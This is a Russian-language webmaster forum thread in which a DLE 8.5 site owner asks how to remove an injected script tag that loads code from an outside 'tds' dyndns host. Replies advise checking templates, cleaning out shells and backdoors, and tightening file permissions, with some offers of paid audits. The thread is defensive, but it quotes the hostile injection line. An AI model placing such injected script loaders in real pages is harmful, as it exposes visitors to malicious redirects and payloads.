Rebz

Rebz
Рейтинг
58
Регистрация
27.01.2009
rebz.net
dimcaster:
Прошу помочь, если кто сталкивался. Недавно Яша начал определять скрытый код
<script src="http://tds-001.dyndns.biz/host.php?id=..."></script>
на некоторых страницах сайта (DLE 8.5). Появляется, а потом исчезает.
Как лечить - в сети не нашел. Помогите, кто уже сталкивался с подобной гадостью. Где ее искать?
Появилась совсем недавно.

Ищите в шаблонах, особенно обратите внимание на вставки js.

Neusweb:
Да уже давно решили проблему)))
Всем спасибо

Отписал бы в чем были проблемы и как их решили, для дальнейших читателей темы это будет полезная информация :)

Обращайтесь, вся инфа в моей подписи.

Ок, успехов в решении проблемы!

Можете у меня аудит безопасности сервера и сайта заказать, если ничего не поможет.

Но в целом читайте форум, уже тема взлома не раз поднималась.

ioncube тоже можно декодировать.

http://www.unzend.com - к примеру. но там за деньги.

Видел в паблике бесплатный.

ну конечно взломщики установили бекдор, понавешали шеллов, они все преспокойно перекочевали на новый хостинг. Чистить код надо.

Можно заказать аудит исходных кодов и сервера :)

Вообще может быть взломан сервер, тогда поможет только смена хостинга + чистка кода от шеллов, бекдоров и проч.

уберите права на запись в этот файл :)

А вообще в этом разделе есть несколько тем, посвященных взлому dle и лечению.

anton831:
Не знаю, трудно спорить, но у меня на хостинге, доступ к .httaccess, можно получить только через FTp, даже через аккаунт невозможно.
И опять же, как через Шелл, можно устанавливать UNIX права на фаилы и папки??

Добрый день.

Если у взломщика рут-доступ к серверу, то ему, в принципе, возможно все :)

Всего: 74